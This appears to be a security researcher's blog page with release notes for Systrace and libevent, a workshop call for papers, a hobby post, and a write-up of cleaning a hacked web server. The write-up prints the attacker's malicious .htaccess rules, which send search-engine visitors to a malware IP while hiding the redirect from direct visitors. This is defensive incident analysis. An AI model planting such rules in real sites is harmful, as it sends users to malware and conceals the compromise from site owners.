Skip to content

WOOT'09 Call For Papers


WOOT is the Workshop on Offensive Technologies. This year, it's being held for the third time and the call for papers just came out. Submissions are solicited for a variety of interesting topics including:

  • Vulnerability research (software auditing, reverse engineering)
  • Exploit techniques and automation
  • Malware design and implementation (rootkits, viruses, bots, worms)

The last two years were a lot of fun and this years organizers are an eclectic bunch of well known folks. If you have anything in the works, go submit it and we will see you at the workshop.
Categories: News, SpyBye, Systrace
Defined tags for this entry: ,

Systrace 1.6g released

This release contains a number of small bug fixes:

- 32-bit compilation has been fixed
- 32-bit policies are no longer created as Linux64 with running on a 64-bit system

The source code can be downloaded here [sig].
Categories: News, Systrace
Defined tags for this entry: ,

Anvil Setup

Anvil and ForgeI got to set up the anvil today and spent a few minutes hammering hot metal. The construction for the anvil stand is from Mark Asprey's book. Joe welded the anvil stand for me and even though the feet are not the same size, it turned out to be surprisingly level. The 165 pound anvil is bolted on top of four layers of plywood. It's reasonably solid but moves a little bit when hit hard.

Categories: Hacking, News

Systrace 1.6f with 64-bit Linux ptrace support

A new version of Systrace that supports 64-bit Linux installations can be downloaded from here. The major changes are support of 64-bit Linux with ptrace as well as 32-bit binaries under a 64-bit system. Let me know if you run into any issues with this.
Categories: News, Systrace
Defined tags for this entry: , ,

Libevent 1.4.9-stable released

We just released libevent 1.4.9-stable. You can download the source from the usual place:

http://monkey.org/~provos/libevent-1.4.9-stable.tar.gz
This release fixes a number of bugs:
  • fixed several memory leaks in the HTTP layer.
  • fixed signal handling for multi-threaded applications.
  • fixed issues with the timer cache when leaving/entering the event loop.
Check here for a more detailed change list.

Thanks to Dean McNamee, Victor Chang, Alejo Sanchez, Richard Jones, Robin Haberkorn and everyone else who reported bugs or supplied patches.
Categories: Libevent, News
Defined tags for this entry: ,

Using htaccess To Distribute Malware

Usually, I get to find compromised web servers, but last week I was asked to fix one. A relative noticed that his web server would try to install a rogue anti-malware product and called me for help. Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar. A little investigation with curl could reproduce that behavior:
curl -I -H "Referer: www.google.com" http://www.foo.com/

returned a 302 redirect to an IP address, whereas
curl -I http://www.foo.com/

returned a 200. To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

This code instructs the web server to redirect visitors to a malware site if they come from popular search engines.

The attackers were able to insert this file as the web application had a remote file inclusion vulnerability. These attacks are quite popular as we found in our paper: To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads. The fix in this case was to remove the .htaccess file and to upgrade the web application to a patched version without the vulnerability.
Categories: Malware, SpyBye
Defined tags for this entry: , ,